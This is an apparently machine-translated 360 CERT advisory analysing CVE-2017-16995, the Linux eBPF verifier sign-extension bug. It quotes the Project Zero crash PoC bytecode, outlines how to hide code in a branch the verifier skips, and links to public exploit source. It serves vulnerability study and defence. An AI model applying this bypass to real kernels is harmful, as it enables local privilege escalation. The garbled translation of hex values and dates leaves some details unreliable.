CVE-2017-16995: Ubuntu Local Elevation of Privilege Analysis Report
Report No.: B6-2018-032101
Report Source: 360 CERT
Report author: 360 CERT
Updated on:
Vulnerability background
Recently, 360-CERT detected that the Linux Kernel Vulnerability attack code numbered CVE-2017-16995 was released, timely issued a warning notice and continue to follow up. The vulnerability was first disclosed by Google project zero and published with the relevant poc. On July 6, December 23, 2017, the Elevation of Privilege Code was published (see reference 8). The Elevation of Privilege code that appeared recently was a modified version.
BPF (Berkeley Packet Filter) is an architecture used to filter network packets (packet). Among them, the famous tcpdump and wireshark all use it (For details, refer to reference 2 ). EBPF is an extension of BPF. However, in Linux kernel implementation, a bypass operation can cause Local Elevation of Privilege.
Poc analysis technical details Poc Overview
Analysis Environment:
Kernel: v4.14-rc1
Main Code (see references 6 ):
(1) BPF_LD_MAP_FD (BPF_REG_ARG1, mapfd ),
(2) BPF_MOV64_REG (BPF_REG_TMP, BPF_REG_FP), // fill r0 with pointer to map value
(3) BPF_ALU64_IMM (BPF_ADD, BPF_REG_TMP,-4), // allocate 4 bytes stack
(4) BPF_MOV32_IMM (BPF_REG_ARG2, 1 ),
(5) BPF_STX_MEM (BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0 ),
(6) BPF_MOV64_REG (BPF_REG_ARG2, BPF_REG_TMP ),
(7) BPF_EMIT_CALL (BPF_FUNC_map_lookup_elem ),
(8) BPF_JMP_IMM (BPF_JNE, BPF_REG_0, 0, 2 ),
(9) BPF_MOV64_REG (BPF_REG_0, 0), // prepare exit
(10) BPF_EXIT_INSN (), // exit
(11) BPF_MOV32_IMM (BPF_REG_1, 0 xffffffff), // r1 = 0xffff 'ffff, mistreated as 0xffff 'ffffff' ffff
(12) BPF_ALU64_IMM (BPF_ADD, BPF_REG_1, 1), // r1 = 0x1 '000000' 0000, mistreated as 0
(13) BPF_ALU64_IMM (BPF_LSH, BPF_REG_1, 28), // r1 = 0x1000 '000000' 0000, mistreated as 0
(14) BPF_ALU64_REG (BPF_ADD, BPF_REG_0, BPF_REG_1), // compute noncanonical pointer
(15) BPF_MOV32_IMM (BPF_REG_1, 0 xdeadbeef ),
(16) BPF_STX_MEM (BPF_W, BPF_REG_0, BPF_REG_1, 0), // crash by writing to noncanonical pointer
(17) BPF_MOV32_IMM (BPF_REG_0, 0), // terminate to make the verifier happy
(18) BPF_EXIT_INSN ()
To clarify why the code crashes, you need to understand the execution process of the bpf Program (see references 2)
When a user submits bpf code, the user performs a verification (simulating code execution), but does not perform the verification during execution.
The vulnerability is caused by the difference between simulated Code Execution (during verification) and real execution.
Next, from these two levels of analysis, it is easy to find the problem.
Simulation execution (verification process) analysis (registers are represented by uint64_t and number of immediate records is expressed by int32_t)
(11) rows: 0 xffffFfff is put into the BPF_REG_1 register (Analysis Code shows that the symbol extension BPF_REG_1 is 0 xffff
Ffffffff
Ffff)
(12) Row: BPF_REG_1 = BPF_REG_1 + 1. At this time, due to register overflow, BPF_REG_1 is changed to 0 because only 64-bit low (register size is 64-bit) is retained.
(13) Row: move left, BPF_REG_1 or 0
(14) Row: Add BPF_REG_0 (map value address) to BPR_REG_1 and BPF_REG_0, and keep them unchanged (this operation can bypass the subsequent address check operation)
(15), (16): change the value of map value to 0 xdeadbeef. (The validity of the map value address is checked when values are assigned. We can conclude from the above analysis that the map value address is valid)
The validators (simulated execution) This bpf code can load it into the kernel.
Real execution (bpf Virtual Machine) analysis (registers are represented by uint64_t, and the number of immediate operations is converted to uint32_t)
(11) Row: Place 0xffffff' ffff (the immediate number is converted to uint32_t) into the low 32-bit BPF_REG_1 without symbol extension.
(12) Row: BPF_REG_1 = BPF_REG_1 + 1. BPF_REG_1 = 0x10000
0000 (prompt again: the runtime register is represented by uint64_t)
(13) Row: move left, BPF_REG_1 = 0x1000 '000000' 0000
(14) Row: Add BPF_REG_0 (map value address) to BPR_REG_1. In this case, BPF_REG_0 becomes an invalid value.
(15), (16): Illegal memory access and crash!
The above is the cause of Poc crash.
Patch Analysis
The above is a patch provided by Jann Horn for symbol extension issues in the check_alu_op () function.
The principle is to convert the 32-bit signed number into a 32-bit unsigned number before entering the _ mark_reg_known function, so that it cannot be expanded. The verification is as follows:
#include <stdio.h>#include <stdint.h>void __mark_reg_known(uint64_t imm){ uint64_t reg = 0xffffffffffffffff; if(reg != imm) printf("360-CERT\n");}int main(){ int imm = 0xffffffff; __mark_reg_known((uint32_t)imm); return 0;}
In this case, no symbolic extension is performed. The output result is 360-CERT.
Privilege Elevation exp analysis experiment environment
Kernel version: 4.4.98
Vulnerability Principle
The root cause of this vulnerability is that the simulated execution results during verification are inconsistent with those of the BPF virtual machine.
This vulnerability is actually a symbolic Extension Vulnerability. A simple code is provided to describe the cause of the vulnerability:
#include <stdio.h>#include <stdint.h>int main(void){ int imm = -1; uint64_t dst = 0xffffffff; if(dst != imm){ printf("360 cert\n"); } return 0;}
During comparison, imm will be extended, resulting in imm being 0 xffffffff
Ffff 'ffff will result in the output of 360 cert
Technical details
You can use the bpf function to set the name parameter to BPF_PROG_LOAD and submit the bpf program to the kernel. When a user submits a program, the kernel verifies the validity of the bpf Program (simulated execution ). However, verification is performed only at the time of submission, but not during the runtime. Therefore, we can find a way to allow malicious code to bypass verification and execute our malicious code.
The verification process is as follows:
1.kernel/bpf/syscall.c:bpf_prog_load 2.kernel/bpf/verifier.c:bpf_check 3.kernel/bpf/verifier.c:do_check
In the 3rd functions, each bpf command is verified. We can analyze this function. It is found that this function uses features similar to branch prediction. Verification is not performed on the branch that will not be executed (Focus: we can place our malicious code in the branch that will not jump)
The parsing of the conditional transfer instruction is located:
1.kernel/bpf/verifier.c: check_cond_jmp_op
By analyzing this function, we can find that:
if (BPF_SRC(insn->code) == BPF_K &&(opcode == BPF_JEQ || opcode == BPF_JNE) &®s[insn->dst_reg].type == CONST_IMM &®s[insn->dst_reg].imm == insn->imm) { if (opcode == BPF_JEQ) { /* if (imm == imm) goto pc+off; * only follow the goto, ignore fall-through */ *insn_idx += insn->off; return 0; } else { /* if (imm != imm) goto pc+off; * only follow fall-through branch, since * that's where the program will go */ return 0; }}
Static analysis is performed when the register and the immediate number are judged by the "not equal" condition. The analysis result does not verify the branch (it must be combined with kernel/bpf/verifier. c: do_check ). When comparing the immediate number with the register,
Register Type:
struct reg_state { enum bpf_reg_type type; union { /* valid when type == CONST_IMM | PTR_TO_STACK */ int imm; /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE | * PTR_TO_MAP_VALUE_OR_NULL */ struct bpf_map *map_ptr; };};
The immediate number type is:
struct bpf_insn { __u8 code; /* opcode */ __u8 dst_reg:4; /* dest register */ __u8 src_reg:4; /* source register */ __s16 off; /* signed offset */ __s32 imm; /* signed immediate constant */};
All are signed and the width is consistent, so this comparison will not cause problems.
The function that is now transferred to the bpf Virtual Machine to execute the bpf command:
/kernel/bpf/core.c: __bpf_prog_run
Analyze this function and find
u64 regs[MAX_BPF_REG];
The uint64_t is used to indicate the register, and the immediate number continues to be the imm field in struct bpf_insn.
View the code for parsing "not equal to comparison command"
#define DST regs[insn->dst_reg]#define IMM insn->imm........JMP_JEQ_K: if (DST == IMM) { insn += insn->off; CONT_JMP; } CONT;
The comparison between 32-Bit Signed and 64-bit unsigned is performed.
We can bypass the malicious code check as follows:
(u32)r9 = (u32)-1if r9 != 0xffff`ffff goto bad_codero,0exitbad_code:.........
When the code is submitted for verification, jne analysis will skip the bad_code check if it is not found to be skipped. However, when it is running, it will cause the jump to true and execute our malicious code.
Download exp from reference 3. Before submitting bpf code to the kernel, we can set the log_level field in the union bpf_attr structure to 1, and fill in other log fields reasonably. After code submission is called, the log is output. We can find that our commands have been verified. The verification result is as follows:
It can be found that only four are verified, but this exp has more than 30 commands (Elevation of Privilege )......
View the code that causes the Vulnerability (comparison between 64-bit unsigned and 32-Bit Signed ),
It was found that the exit command was successfully skipped and bad_code was executed.
Timeline
The Elevation of Privilege attack code was made public on February 16
360CERT issued an alert notice
Technical Report released by 360CERT
Reference
1. https://github.com/torvalds/linux/commit/95a762e2c8c942780948091f8f2a4f32fce1ac6f
2. https://www.ibm.com/developerworks/cn/linux/l-lo-eBPF-history/index.html
3. http://cyseclabs.com/exploits/upstream44.c
4. https://sysprogs.com/VisualKernel/tutorials/setup/Ubuntu/
5. https://github.com/mrmacete/r2scripts/blob/master/bpf/README.md
6. https://bugs.chromium.org/p/project-zero/issues/detail? Id = 1454 & desc = 3
7. https://github.com/iovisor/bpf-docs/blob/master/eBPF.md
Https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c
This article permanently updates link: https://www.bkjia.com/Linux/2018-03/151543.htm